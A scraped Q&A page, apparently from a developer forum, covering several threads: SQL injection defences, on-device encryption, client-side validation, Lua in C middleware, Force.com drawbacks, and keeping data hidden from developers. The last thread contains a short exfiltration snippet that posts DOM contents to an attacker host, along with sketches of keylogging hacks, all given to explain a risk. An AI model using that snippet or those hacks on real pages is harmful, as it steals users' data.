How do you protect against malicious code in web forms? - database

I understand this is probably going to sound like an extremely rudimentary question to some of the more senior people on here, but I had to ask. I know Google is there for my use, but I wanted to make sure I found the right answer. My friend is concerned that when we post a coming-soon page for our project, someone could post malicious code into our web form (username, DOB, email, contact information sort of web form), and he wants to know the best way to protect against such malicious code injections.
Do you just get SSL protection on your database, or is there something more programming-intensive we need to do to protect ourselves and the information we collect?

You sanitize your inputs before storing them, which generally means escaping special characters in the SQL (or whatever your storage layer uses) before building a query.
Pretty much every language and platform for building web applications provides ways to do this. Typically you'll use whatever flavor of parameterized queries your infrastructure provides, and it will handle the escaping for you (or avoid the need for it entirely by sending the values separately from the query text). "Sanitizing inputs" is the Google keyword here.
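For example, here is a minimal sketch using Node/TypeScript with the node-postgres (pg) library (an assumed stack; the signups table and its columns are made up for illustration). The point is that user input travels as parameters rather than being concatenated into the SQL string:

```typescript
import { Pool } from "pg";

const pool = new Pool(); // reads connection settings from environment variables

// Hypothetical signup handler: the "signups" table and its columns are
// illustrative, not from the original question.
export async function saveSignup(username: string, dob: string, email: string) {
  // The $1/$2/$3 placeholders keep user input out of the SQL text entirely,
  // so a value like "'; DROP TABLE signups; --" is stored as plain data.
  await pool.query(
    "INSERT INTO signups (username, dob, email) VALUES ($1, $2, $3)",
    [username, dob, email]
  );
}
```

Whether you use pg, an ORM, or something else, the shape is the same: the query text stays constant and the values travel separately.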
This has nothing to do with SSL at all. SSL encrypts network traffic so third parties can't spy on it. The use of SSL is completely independent of your site's susceptibility to code injection attacks.
I would go into more detail about sanitizing inputs but without more information there's not much I can say, and also info about this is readily available in docs, tutorials, and examples all over the Internet.

Related

How to properly encrypt information using Core Data

I'm developing an app that manages sensitive information. For this reason I would like to give the user the option of creating a password to encrypt the data. This information is only to be saved on the device; the idea is not to encrypt and send the data over a network, but to prevent other people with total access to the device from having access to it.
Now, what I don't know is whether I should encrypt the whole database or encrypt each entry before saving it. What is the recommended approach to encrypting databases?
Diego,
Encrypting data is a subtle problem.
First, do the easy stuff. Turn on Apple's file security. That will probably give you more security for less effort than anything you can write. It probably provides all of the security you really need on the device. If it doesn't, you should know exactly what it doesn't provide; that would be the main reason for writing special-purpose code. Apple recently posted an excellent white paper on iOS security. We all should read it.
Second, security is broken in subtle and non-obvious ways. It just isn't a matter of firing up the encryption and then hoping for the best. How are you going to handle key distribution to other devices? How are you going to handle lost keys? Do you trust Apple's keychain? (Have they fixed their process in the wake of "goto fail;"?)
The way most security folks I know handle these issues is by building detailed scenarios of use. And then implementing code to see if the design is any good. Then asking their friends and consultants to poke holes in the design; fix the holes until you have "confidence" in your design. If you are new to security, and by the nature of your question I assume you are relatively new to the field, then you should NOT have confidence in your design. You now need to reimplement your design with simpler code and simpler processes. Then put it in front of real users. They will show you how your security process fails in real hands. Bad security design has killed many products and it can kill yours.
I would be very careful. Use what Apple has already carefully engineered. Seriously ask yourself if you need more than that. Ask your management how much they want to spend on security. Ask your users how much of the bother of security they will put up with. I suspect the answer to both questions is: no, they do not want to pay for or bother with security.
As a result, do the simple stuff: use Apple's iOS security.
Anon,
Andrew

AngularJS business logic

In AngularJS it is possible to use a RESTful server API just to store the objects, with all the business logic embedded in JavaScript. Most of the examples seem to point in that direction.
Is this not bad practice both in terms of maintainability and security?
This question is a little vague, but I'll try to give a broad answer: I do not feel it is bad practice to migrate logic to the client side.
Maintainability
Heavens no! I started my career on the backend and I can say with a high degree of confidence that whether the code is on the front end or the back end has no bearing on its maintainability; code is code. Whether we place it in a reusable service component on the client or a reusable library on the server, change management is very similar. See the security section for an important additional note.
Business Logic
Honestly, I've never understood why developers are so reticent when it comes to their business logic. It's as if in their minds if only someone were to reverse engineer their code, they would discover some magical reality of which they had never conceived - they would be witness to the developer's genius! - and would now be sufficiently armed to commit some act of market aggression.
This is absurd. They can see your service; they can see your user interface; they know the goal. If they want to replicate you, they already can. It's incredibly rare that it is our business logic that is the key to our products. It's just not a concern in 99% of cases.
And any massively complex algorithm at the center of the business wouldn't end up on the client anyway, right? We do the heavy lifting on our distributed file stores with map/reduce operations and semantic graphs...
Security
This is an important consideration as always, but the key is in the REST API. The REST API is the official gateway that cannot be tampered with. If our user model requires a first_name field, it is the REST API's job to ensure that field is there. We probably also introduce checks on the client side, but these are almost always created with user experience in mind: synchronous and instant feedback is better than asynchronous and delayed feedback.
Anything related to security, strictly defined, is on the server. Authentication and authorization are obviously on the server. They're never on the client. So we're not introducing any vulnerabilities by choosing the single-page application paradigm. Just think about Twitter, or Google products, or Facebook - they all have open APIs that we can use in lieu of the web interface to accomplish the same goals. The APIs enforce the key rules, they ensure proper security, but they leave user experience up to the client.
Obviously, this implies that some logic is duplicated on the client and server, like basic validation. Sure. But we do it for user experience. It introduces a little bit more complexity into our change management processes, but it's far outweighed by the user experience gains.
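As a rough sketch of that split (Express on the server is an assumption here, and first_name is just the field from the example above), the API is the authoritative gate and the client-side check exists only for instant feedback:

```typescript
import express from "express";

const app = express();
app.use(express.json());

// Server side: the REST API is the authoritative gatekeeper.
app.post("/users", (req, res) => {
  const { first_name } = req.body ?? {};
  if (typeof first_name !== "string" || first_name.trim() === "") {
    // Reject regardless of what the client-side code did or didn't check.
    return res.status(400).json({ error: "first_name is required" });
  }
  // ... persist the user, authorization checks, etc.
  return res.status(201).json({ first_name: first_name.trim() });
});

// Client side: the same rule duplicated purely for user experience,
// so the user gets instant feedback instead of a round trip.
export function validateFirstName(value: string): string | null {
  return value.trim() === "" ? "First name is required" : null;
}
```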

Middleware: Using C as the engine, Lua for Adapters...is this bad practice (Security risk)?

I am an integration consultant and tend to use C and Lua in my spare time; unfortunately it is not my day job ;-(
Anyway, I tend to believe that a mixture of C and Lua is perfect for many "product" developments. I currently have an "adapter engine" built in pure C, but would like to actually move the adapter code to Lua....
For example, coding an EMAIL adapter in Lua is far easier than in C...yet I like the "engine speed of C"....
But now there is the big question of security risk, in that the user can potentially add whatever he or she wants to the Lua scripts in production... Obviously we could CHMOD the files, but is that really secure?
Ideally I want the C / Lua combination here... but do I literally embed the Lua code in the C application with a char*, or do I issue a lua_dofile?
Thanks for the help
Lynton
First, one of the drawbacks to using C/Lua in production is it tends to be harder to find resources who can develop for these languages. C++ and JavaScript programmers are typically easier to find.
In terms of security, the key here is to use leading practices. Security is about risk reduction; there is no expectation that one can achieve perfect security, so you need to mitigate risk.
Here are my suggestions:
As with all middleware, you need to use a hardened server. This is the first step: if the server is compromised, you are in trouble no matter what platform you are using. Middleware should NOT be in the DMZ.
You want to store the Lua code external to the compiled code (otherwise you lose the advantage of using Lua.) Make that storage as secure as you can. CHMOD is good, a secure DB server is better. The more secure the script store the more secure the system.
You can encrypt the Lua source - this is a trade off since it makes it a little harder to gain the advantage of easy updates and modification. You will probably need to implement decrypted script caching for performance.
Your security is as strong as your weakest link. If you provide a way to modify the Lua source via external access this will be an attack vector. Avoid this design if you can.
You should consider putting in change management checks, for example a separate place in the system where a checksum for each Lua file is stored. Then, if an unauthorized change is made to a script, you can abort functioning until the security breach is mitigated.
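The checksum idea is language-agnostic. Here is a minimal sketch in TypeScript/Node (the engine in the question is C, so treat this as pseudocode for the same check); the file path and the expectedChecksums store are assumptions:

```typescript
import { createHash } from "crypto";
import { readFileSync } from "fs";

// Hypothetical trusted store of known-good SHA-256 hashes, kept somewhere
// the script author cannot write to (e.g. a locked-down DB table).
const expectedChecksums: Record<string, string> = {
  "adapters/email.lua": "<expected sha-256 hex digest>",
};

export function verifyAdapterScript(path: string): void {
  const actual = createHash("sha256").update(readFileSync(path)).digest("hex");
  if (expectedChecksums[path] !== actual) {
    // Abort before the script is handed to the Lua interpreter.
    throw new Error(`Checksum mismatch for ${path}; refusing to load it`);
  }
}
```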
Other than the drawback I mentioned above, I don't think there is anything fundamentally flawed in your plan. If it can aid in making a good middleware system I would say go for it. Just mitigate the risk of your adapter scripts getting compromised as much as possible.
To expand on Donal's comment - given the popularity of Node, I would say that JavaScript is the leading practice in scripted middleware right now. If you can handle learning a new scripting language, I would say it would be a good idea given the support, popularity, and tools available.
Your primary requirement in terms of security is to ensure that the server cannot evaluate anything sent by clients by any mechanism (not just direct evaluation, but also through supplied filenames). A lesser requirement is that clients should also not have any mechanism to produce a message that allows other clients to evaluate unexpected things (i.e., avoid XSS trouble). If you can satisfy these requirements, you've got a safe server, and the language(s) that it is written in won't matter; using multiple languages is in fact a good idea, as it lets you leverage the best of each.
It's also a good idea to use a carefully configured firewall, plenty of privilege restriction, some kind of DMZ proxy system to at least verify basic syntactic legality of messages, etc. These things are all just good practice. (Aim to configure things so the server can only just manage to do the service you want to provide.)
With sending email, there are a few other things to beware of. In particular, you do not want to be a conduit for spam, so you need to take care to ensure that arbitrary email headers cannot be constructed from client input and that the data formats you send out are non-executable (or that the data is constructed in a way that is non-evil). Rate limiting is also a good idea; unless your site is insanely popular, you shouldn't need to send more than a few messages a second across all clients. If you're ever sending only to a small set of addresses (e.g., to a fixed contact address) then you can relax these restrictions a bit (but still be careful of header injection). In all cases, route all email through a specialist email-handling server instead of doing the routing yourself, as this avoids a whole lot of configuration difficulties.
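A minimal sketch of those two precautions, in plain TypeScript with no particular mail library assumed: strip CR/LF so client input can never smuggle extra headers, and apply a crude global rate limit:

```typescript
// Header injection works by sneaking "\r\n" into a value so the attacker can
// append their own headers (Bcc:, extra recipients, etc.). Stripping CR/LF
// from anything that ends up in a header defeats that.
export function sanitizeHeaderValue(value: string): string {
  return value.replace(/[\r\n]+/g, " ").trim();
}

// Crude token-bucket limiter: at most `ratePerSecond` messages across all
// clients. A real deployment would persist this and rate-limit per sender too.
export function makeRateLimiter(ratePerSecond: number) {
  let tokens = ratePerSecond;
  let last = Date.now();
  return function allowSend(): boolean {
    const now = Date.now();
    tokens = Math.min(ratePerSecond, tokens + ((now - last) / 1000) * ratePerSecond);
    last = now;
    if (tokens < 1) return false;
    tokens -= 1;
    return true;
  };
}
```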

Disadvantages of the Force.com platform [closed]

We're currently looking at using the Force.com platform as our development platform and the sales guys and the force.com website are full of reasons why it's the best platform in the world. What I'm looking for, though, is some real disadvantages to using such a platform.
Here are 10 to get you started.
1. Apex is a proprietary language. Other than the force.com Eclipse plugin, there's little to no tooling available, such as refactoring, code analysis, etc.
2. Apex was modeled on Java 5, which is considered to be lagging behind other languages, and without tooling (see #1), can be quite cumbersome.
3. Deployment is still fairly manual with lots of gotchas and manual steps. This situation is slowly improving over time, but you'll be disappointed if you're used to having automated deployments.
4. Apex lacks packages/namespaces. All of your classes, interfaces, etc. live in one folder on the server. This makes code much less organized and class/interface names necessarily long to avoid name clashes and to provide context. This is one of my biggest complaints, and I would not freely choose to build on force.com for this reason alone.
5. The "force.com IDE", aka the force.com Eclipse plugin, is incredibly slow. Saving any file, whether it be a class file, text file, etc., usually takes at least 5 seconds and sometimes up to 30 seconds depending on how many objects, data types, class files, etc. are in your org. Saving is also a blocking action, requiring not only compilation but a full sync of your local project with the server. Orders of magnitude slower than Java or .NET.
6. The online developer community does not seem very healthy. I've noticed lots of forum posts go unanswered or unsolved. I think this may have something to do with the forum software salesforce.com uses, which seems to suck pretty hard.
7. The data access DSL in Apex leaves a lot to be desired. It's not even remotely competitive with the likes of (N)Hibernate, JPA, etc.
8. Developing an app on Apex/Visualforce is an exercise in governor limits engineering. Easily half of programmer time is spent trying to optimize to avoid the numerous governor limits and other gotchas like Visualforce view state limits. It could be argued that if you write efficient code to begin with you won't have this problem, which is true to an extent. However, there are many times that you have valid reasons to make more than x queries in a session, or loop through more than x records, etc.
9. The save->compile->run cycle is extremely slow, especially when it involves zipping and uploading the entire static resource bundle just to do something like test a minor CSS or JavaScript change.
10. In general, the pain of a young, fledgling platform without the benefits of it being open source. You have no way to validate and/or fix bugs in the platform. They say to post it to their IdeaExchange. Yeah, good luck with that.
Disclaimers/Disclosures: There are lots of benefits to a hosted platform such as force.com. Force.com does regularly enhance the platform. There are plenty of things about it I like. I make money building on force.com
I see you've gotten some answers, but I would like to reiterate how much time is wasted getting around the various governor limits on the platform. As much as I like the platform on certain levels, I would very strongly, highly, emphatically recommend against it as a general application development platform. It's great as a super configurable and extensible CRM application if that's what you want. While their marketing is exceptional at pushing the idea of Force.com as a general development platform, it's not even remotely close yet.
The efficiency of having a stable platform and avoiding big performance and stability problems is easily wasted in trying to code around the limits that people refer to. There are so many limits to the platform, it becomes completely maddening. These are not high-end limits you'll hit only once you have a lot of users; you'll hit them almost right away.
While there are usually techniques to get around them, it's very hard to figure out strategies for avoiding them while you're also trying to develop the business logic of your actual application.
To give you a simple sense of how developer un-friendly the environment is, take the "lack of debugging environment" referred to above. It's worse than that. You can only see up to 20 of the most recent requests to the server in the debug logs. So, as you're developing inside the application you have to create a "New" debug request, select your name, hit "Save", switch back to your app, refresh the page, click back to your debug tab, try to find the request that will house your debug log, hit "find" to search for the text you're looking for. It's like ten clicks to look at a debug output. While it may seem trivial, it's just an example of how little care and consideration has been given to the developer's experience.
Everything about the development platform is a grafted-on afterthought. It's remarkable for what it is, but a total PITA for the most part. If you don't know exactly what you are doing (as in you're certified and have a very intimate understanding of Apex), it will easily take you upwards of 10-20x the amount of time that it would in another environment to do something that seems like it would be ridiculously simple, if you can even succeed at all.
The governor limits are indeed that bad. You have a combination of various limits (database queries, rows returned, "script statements", future calls, callouts, etc.) and you have to know exactly what you are doing to avoid these. For example, if you have a calculated rollup "formula" field on an object and you have a trigger on a child object, it will execute the parent object triggers and count those against your limits. Things like that aren't obvious until you've gone through the painful process of trying and failing.
You'll try one thing to avoid one limit, and hit another in a never-ending game of "whack a limit". In the process you'll have to drastically re-architect your entire app and approach, as well as rewrite all of your test code. You must have 75% test code coverage to deploy into production, which is actually a very good thing, but combined with all of the other limits, it's very burdensome. You'll actually hit governor limits writing your test code that wouldn't come up in normal user scenarios, but that will prevent you from achieving the coverage.
That is not to mention a whole host of other issues. Packaging isn't what you expect: you can't package up your app and deliver it to users without significant user intervention and configuration on the part of the administrator of the org. The AppExchange is a total joke, and they've even started charging 5K just to get your app listed. Importing with the data loader sucks, especially if you have any triggers. You can't export all of your data in one step, including your relationships, in such a way that it can easily be re-imported into another org (for example a dev org) in a single step. You can only refresh a sandbox once a month from production, no exceptions, and you can't include your data in a refresh by default unless you have called your account executive to get that feature unlocked. You can't mass delete data in custom objects. You can't change your package names. Certain things can take numerous days to complete after you have requested them, such as a data backup before you want to deploy an app, with no progress report along the way and not much sense of when exactly the export occurred. And because exports of related objects aren't kept in sync with one another, there are serious data integrity issues: there is no such thing as a "transaction" that can export numerous objects in a single step. There are probably some commercial tools to facilitate some of this, but these are not within reach of normal developers who may not have a huge budget.
Everything else the other people said here is true. It can take anywhere from five seconds to a minute sometimes to save a file.
I don't mean to be so negative because the platform is very cool in some ways and they're trying to do things in a multi-tenant environment that no one else is doing. It's a very innovative environment and powerful on some levels (I actually like VisualForce a lot), but give it another year or two. They're partnering with VMware, maybe that will lead to giving developers a bit more of a playpen rather than a jail cell to work in.
Here are a few things I can give you after spending a fair bit of time developing on the platform in the last fortnight or so:
There's no RESTful API. They have a SOAP-based API that you can call, but there is no way of making true RESTful calls.
There's no simple way to take their SObjects and convert them to JSON objects.
The Visualforce pages are OK until you want to customize them, and then it's a whole world of pain.
Visualforce pages need to be bound to SObjects; otherwise there's no way to get the standard input fields like the date picker or select list to work.
The Eclipse plugin is OK if you want to work by yourself, but if you want to work in a large team with the Eclipse plugin, forget it. It doesn't handle synchronizing to and from the server, it crashes, and it isn't really helpful at all.
THERE IS NO DEBUGGER! If you want to debug, it's literally done with System.debug statements. This is probably the biggest problem I've found.
Their "MVC" model isn't really MVC. It's a lot closer to ASP.NET WebForms. Your views are tightly coupled to not only the models but the controllers as well.
Storing a large number of documents is not feasible. We need to store over 100 GB of documents and we were quoted some ridiculous figure. We've decided to implement our document storage on Amazon's S3 infrastructure.
Even though the language is Java-based, it's not Java. You can't import any external packages or libraries. Also, the base libraries that are available are severely limited, so we've found ourselves implementing a bunch of stuff externally and then exposing those bits as services that are called by force.com.
You can call external SOAP- or REST-based services, but the message body is limited to 100 KB, so it's very restrictive in what you can call.
In all honesty, whilst there are potential benefits to developing on something like the force.com platform, for me, you couldn't use the force.com platform for true enterprise-level apps. At best you could write some basic CRUD-style applications, but once you move into anything remotely complicated I'd be avoiding it like the plague.
Wow, there's a lot here that I didn't even know were limitations, even after working on the platform for a few years.
But just to add some other things...
The reason you don't have a line-by-line debugger is precisely because it's a multi-tenant platform. At least that's what SFDC says - it seems like in this age of thread-rich programming, that isn't much of an excuse, but that's apparently the reason. If you have to write code, you have "System.debug(String)" as your debugger - I remember having more sophisticated server debugging tools in Java 1.2 about 12 years ago.
Another thing I really hate about the system is version control. The Spring framework is not used for what Spring is usually used for - it's really more of a configuration tool in SFDC rather than version control. SFDC provides ZERO version control.
You can find yourself stuck for days doing something that should seem ridiculously easy, like, say, scheduling an SFDC report to export to a CSV file and email it to a list of recipients... Well, about the easiest way to do that is to create a custom object with a custom field, with a workflow rule and a Visualforce email template... and then for code you need to write a Visualforce component that streams the report data to the Visualforce email template as an attachment, and you write anonymous Apex code to schedule a field update of the custom object... For SFDC developers, this is almost a daily task: trying to put about five different technologies together to do tasks that seem so simple. And this can cause management headaches and tensions too - typically, you'd find this out after getting a suggestion in the user community to do something that doesn't work (like someone already said), and then trying many things that, after you developed them, you'd find just don't work for some odd-ball reason - like "you can't schedule a Visualforce page", or "you can't call getContent from a schedulable context", or some other arcane reason.
There are so many, many maddening little gotchas on the SFDC platform that, once you know WHY they're there, they make sense... but they're still very bad limitations that keep you from doing what you need to do. Here are some of mine:
You can't get record owner information "out of the box" on pretty much any kind of record - you have to write a trigger that links the owner on create of the record to the record you're inserting. Why? Short answer because an owner can be either a "person" or a "queue", and the two are drastically different entities... Makes sense, but it can turn a project literally upside down.
Maddening security model. Example: "Manage Public Reports" permission is vastly different from "Create and Customize Reports" and that basically goes for everything on the platform... especially folders of any kind.
As mentioned, support is basically non-existent. If you are an extremely self-sufficient individual, or have a lot of SFDC resources, or have a lot of time and/or a very forgiving manager, or are in charge of a SFDC system that's working fine, you're in pretty good shape. If you are not in any of these positions, you can find yourself in deep trouble.
SFDC is a very seductive business proposition... no equipment footprint, pretty good security, fixed price, no infrastructure, AND you get web-based CRM with batchable and schedulable processing... But as the other posters said, it is really quite a ramp-up in development learning, and if you go with consulting, I think the lowest price I've seen was $200/hour.
Salesforce tends to integrate with other things years after some technologies become commonplace - JSON and jQuery come to mind... and if you have other common infrastructure that you want to integrate with, like JIRA, expect to pay a lot extra, and the integrations can be quite buggy.
And as one of the other posters mentioned, you are constantly fighting governor limits that can just drive you nuts... an attachment can NOT be > 5MB. Period. And sometimes < 3MB (if base64 encoded). Ten HTTP callouts in a class. Period. There are dozens of published governor limits, and many that are not which you will undoubtedly find and just want to run out of your office screaming.
I really, REALLY like the platform, but trust me - it can be one really cruel mistress.
But in fairness to SFDC, I'd say this: the biggest problem I find with the platform is not the platform itself, but the gargantuan expectations that almost anyone who sees the platform, but hasn't developed on it has.... and those people tend to be in positions of great authority in business organizations; marketing, sales, management, etc. Huge disconnects occur and heads roll, or are threatened to roll daily - all because there's this great platform out there with weird gotchas and thousands of people struggling daily to get their heads around why things should just work when they just don't and won't.
EDIT:
Just to add to lomaxx's comments about the MVC: in SFDC terminology, this is closely related to what's known as the "view state" - and it can be really buggy, in that what is on the VF page is not what is in the controller class for the page. So you have to go through weird gyrations to sync what's on the page with what the controller is going to write to SF when you click your "save" button (or make your HTTP callout or whatever)... man, it's annoying.
I think other people have covered the disadvantages in more depth but to me, it doesn't seem to use the MVC paradigm or support much in the way of code reuse at all. To do anything beyond simple applications is an exercise in frustration compared to developing an application using something like ASP.Net MVC.
Furthermore, the tools, the data layer and the frustration of trying to refactor code or rename fields during the development process doesn't help.
I think as a CMS it's pretty cool, but as a platform for non-CMS applications, it doesn't make sense to me.
The security model is also very very restrictive... but this isn't the worst part. You can't currently assert whether a user has the ability to perform a particular action.
You can check to see what their role is, but you can't check if that role has permissions to perform the current action.
Even worse is the response from tech support to "try the action and if there's an exception, catch it"
Considering Force.com is a "cloud" platform, its ability to act as a client to an external WSDL-defined service is pretty underwhelming. See http://force201.wordpress.com/2010/05/20/when-generate-from-wsdl-fails-hand-coding-web-service-calls/ for what you might end up having to do.
To all of the above, I am curious how the release of VMforce, allowing Java programmers to write code for Force.com, changes the disadvantages listed above.
http://www.zdnet.com/blog/saas/vmforcecom-redefines-the-paas-landscape/1071
I guess they are trying to address these issues. At Dreamforce they mentioned they were trying to drop the governor limits to only 4. I'm not sure what the details are. They have a REST API in early access, and they bought Heroku, which is a Ruby development platform in the cloud. They split out the database with database.com, so you can do your web development elsewhere and make your DB calls against database.com.
I guess they are trying to make it as agnostic as possible. But right about now these are all announcements and early access, so - as their Safe Harbor statements say - don't purchase based on what they say, only on what they currently have.

How do I create a web application where I do not have access to the data?

Premise: The requirements for an upcoming project include the fact that no one except authorized users may have access to certain data. This is usually fine, but this circumstance is not usual. The requirements state that there be no way for even the programmer or any other IT employee to be able to access this information. (They want me to store it without being able to see it, ever.)
In all of the scenarios I've come up with, I can always find a way to access the data. Let me describe some of them.
Scenario I: Restrict the table on the live database so that only the SQL Admin can access it directly.
Hack I: I roll out a change that sends the data to a different table for later viewing. Also, the SQL Admin can see the data, which breaks the requirement.
Scenario II: Encrypt the data so that it requires a password to decrypt. This password would be known by the users only. It would be required each time a new record is created as well as each time the data from an old record was retrieved. The encryption/decryption would happen in JavaScript so that the password would never be sent to the server, where it could be logged or sniffed.
Hack II: Roll out a change that logs keypresses in JavaScript and posts them back to the server so that I can retrieve the password. Or, roll out a change that simply stores the unencrypted data in a hidden field that can be posted to the server for later viewing.
Scenario III: Do the same as Scenario II, except that the encryption/decryption happens on a website that we do not control. This magic website would allow a user to input a password and the encrypted or plain-text data, then use JavaScript to decrypt or encrypt that data. Then, the user could just copy the encrypted text and put it in the field for new records. They would also have to use this site to see the plain-text for old records.
Hack III: Besides installing a full-fledged key logger on their system, I don't know how to break this one.
So, Scenario III looks promising, but it's cumbersome for the users. Are there any other possibilities that I may be overlooking?
If you can have JavaScript on the page, then I don't think there's anything you can do. If you can see it in a browser, then that means it's in the DOM, which means you can write a script to get it and send it to you after it has been decrypted.
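To make that concrete, something like the following is all it takes once the plaintext is in the DOM (the element id and the collection URL are made up for illustration); any script that gets onto the page can do it:

```typescript
// Runs in the victim's browser alongside the "legitimate" page code.
const secret = document.getElementById("decrypted-record")?.textContent ?? "";

// Ship it off to wherever the rogue developer likes.
void fetch("https://attacker.example/collect", {
  method: "POST",
  body: secret,
});
```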
Aren't these problems usually solved via controls:
All programmers need a certain level of clearance and background checks
They are trained to understand that rolling out code to access the data is a fireable or worse offense
Every change in certain areas needs some kind of signoff
For example -- no JavaScript on page without signoff.
If you are allowed to add any code you want, then there's always a way, IMO.
Ask the client to provide a non-disclosure agreement for you to sign, sign it, then look at as much data as you want.
What I'm wondering is, what exactly will you be able to do with encrypted data anyway? Pretty-much all apps require you to do some filtering of the data, whether it be move it to a required place, modify it, sanitize it, or display it. Otherwise, you're just a glorified pipe, and you don't have to do any work.
The only way I can think of where you wouldn't be looking at the data or doing anything with it would be a simple form-to-table mapping with CRUD options. If you know what format the data will be coming in as, you should be able to build something with RoR and a simple skin, put SSL into the mix, and roll it out. Test with dummy data in the same format, and you're set.
In fact, is your client unable to supply dummy data for testing? If they can, then your life is simple as all you do is provide an "installable" and tell them how to edit a config file.
I think you could still create the app in the following way:
Create a dev database and set up a user for it.
Ask them for: the data type, size, and name of each field that needs to be on the screen.
Set up the screens, create columns in the database that accept the data type and size they specify.
Deploy the app to production, hooked up to an empty database. Get someone with permission (not you) to go in and set the password on the database user and set the password for the DB user in the web app.
Authorized users can then do whatever they want and you never saw what any of the data looked like.
Of course, maintaining the app and debugging is gonna be a bitch!
--In answer to comments:
Ok, so after setting up the password for the Username in the database and in the web app's config, write a program that connects to the database, sets a randomized password, then writes that same randomized password to the web config.
Prevent any outgoing packets from the machine except to a set of authorized workstations - so you can't install your spyware.
Then set the Admin password on both servers to the same random password, then delete all other users on the servers, delete the program, and delete the program source code.
Wipe the hard drives of the developer machines with the DOD algorithm, and then toss them into an industrial shredder.
10. If the server ever needs debugging, toss it in the trash, buy a new one, and start back at #1.
But seriously - this is an insolvable problem. The best answer to this really is:
Tell them they can't have an application. Write your stuff on paper. Put it in a folder. Lock it in a vault. Thrust, repeat.
Wouldn't scenario 3 just expose all the data to the magic website? This doesn't sound like a solvable problem (at least I can't think of a solution).
Go with whatever solution is easiest for you to implement. I think the requirements show that the client does not understand software development, so it should be easy to sell any approach you take.
I have to say I really don't like the idea of using JavaScript on the client to decrypt the data. That is a huge hole as any script (hacker, GreaseMonkey, IE7Pro, etc.) can access the DOM and get data out of the page.
Also, it is very hard to get around the problem of keystroke loggers. If you throw those into the mix, then your options are limited. At that point you need a security fob such as an RSA token (commonly used with corporate VPNs) to generate one-time PINs. That will probably be expensive, and it is a pain, and I have only seen it used with VPNs, but I assume it could work with websites as well.
As far as the website, I'd stick with HTTPS and find a way to encrypt/decrypt through the WebServer rather than relying on JavaScript. The SSL traffic isn't very prone to sniffing (very difficult to decrypt), so that allows the encryption and decryption to happen server-side which (IMHO) is more secure.
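A minimal sketch of that server-side approach in Node/TypeScript, assuming the key is derived from a passphrase supplied at runtime (where that passphrase lives is exactly the hard part the rest of this thread is about):

```typescript
import { createCipheriv, createDecipheriv, randomBytes, scryptSync } from "crypto";

// Derive a 256-bit key from a passphrase the server is given at runtime
// (environment variable, HSM, etc. - NOT hard-coded and NOT stored with the data).
const key = scryptSync(process.env.DATA_PASSPHRASE ?? "", "fixed-app-salt", 32);

export function encryptRecord(plaintext: string): string {
  const iv = randomBytes(12);
  const cipher = createCipheriv("aes-256-gcm", key, iv);
  const body = Buffer.concat([cipher.update(plaintext, "utf8"), cipher.final()]);
  // Store IV + auth tag + ciphertext together; none of them are secret.
  return Buffer.concat([iv, cipher.getAuthTag(), body]).toString("base64");
}

export function decryptRecord(stored: string): string {
  const raw = Buffer.from(stored, "base64");
  const decipher = createDecipheriv("aes-256-gcm", key, raw.subarray(0, 12));
  decipher.setAuthTag(raw.subarray(12, 28));
  return Buffer.concat([decipher.update(raw.subarray(28)), decipher.final()]).toString("utf8");
}
```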
Look at banking scenarios and other financial institutions for a starting point, and then go from there. Try not to over-complicate if possible.
You can't guarantee against hacking into the data as long as you have access to the server it lives on. So tell the employer they have to host the data somewhere else and grant access to the client's browser via a secure HTTPS connection.
You can design your web page to dynamically load an XML data stream securely, and format it into a web page using an XSLT script on the client.
See http://www.w3schools.com/xsl/xsl_client.asp for examples
That way you produce the code, but you never have access to the data. Only the user has access to their own data.
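A minimal browser-side sketch of that idea in TypeScript; XSLTProcessor and DOMParser are standard browser APIs, and the URLs are placeholders:

```typescript
async function renderSecureData(xmlUrl: string, xslUrl: string): Promise<void> {
  const parser = new DOMParser();
  const [xmlText, xslText] = await Promise.all([
    fetch(xmlUrl, { credentials: "include" }).then((r) => r.text()),
    fetch(xslUrl).then((r) => r.text()),
  ]);

  const xml = parser.parseFromString(xmlText, "application/xml");
  const xsl = parser.parseFromString(xslText, "application/xml");

  // The transform happens entirely in the user's browser; the developer's
  // server only ever ships code and stylesheets and never sees the data.
  const processor = new XSLTProcessor();
  processor.importStylesheet(xsl);
  document.body.appendChild(processor.transformToFragment(xml, document));
}

// Placeholder endpoints: the data host is controlled by the client, not the developer.
void renderSecureData("https://client-data.example/records.xml", "/render.xsl");
```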
As for how the employer is going to host the data without granting any IT people access to it, that's their problem. It's a foolish requirement.
I think that I'll just tell them that they either have to trust a couple of us to have access (and not look at it) or they don't get a project.
Thanks for the answers. Feel free to post more thoughts if you have them.
You can never have 100% security, and extra security comes at a cost of speed/price/convenience etc.
Let's suppose you take scenario 3 - one of your programmers can use social engineering to get the password from one of the users. Goodbye security.
There's no point having a high-security iron door as a gate if people can just walk around it. Just implement a decent level of security.
(They want me to store it without being able to see it, ever.)
Hey, the recording industry wants people to be able to listen to their music, but not copy it. Sounds like they should get together sometime!
Their idea won't work for the same reason DRM doesn't work: the trust chain is inherently compromised. Encryption examples often use Alice, Bob, and Charlie where Alice is trying to communicate with Bob without Charlie listening in. With DRM, the trust chain is compromised because Bob and Charlie are the same person. With your situation, Charlie is the guy writing the software that Alice and Bob use to communicate. There's an implied trust, because if you don't trust Charlie then you can't trust Charlie's software, either.
That's the root of the issue: trust. If they can't trust the programmer, the game is over before it starts.
There are lots of options based on what their goal really is, but I am confused by their paranoia, er, intent:
Is this their (and end-user) data that they wish to keep private or end-user data to be kept private from everyone?
Is it just that your (or any contracted) company is suspect?
Are they afraid of over-the-wire snooping?
Are they afraid of DOM access through JavaScript or browser plugins?
Are they planning staged deployment? In that case you work on test/dev server w/o real data but have no access to the production server with the real data, and DNS logging and/or firewall rules inhibit all of your hacks from working undetected.
Ultimately if the data is stored in a DB then the programmer and DB admin can, by working together, get it. Period. A good audit should uncover that, though.
If this is truly a requirement, the only way to guard against this is to hire an outside firm to audit the code prior to releasing the software, and that's going to be very expensive.
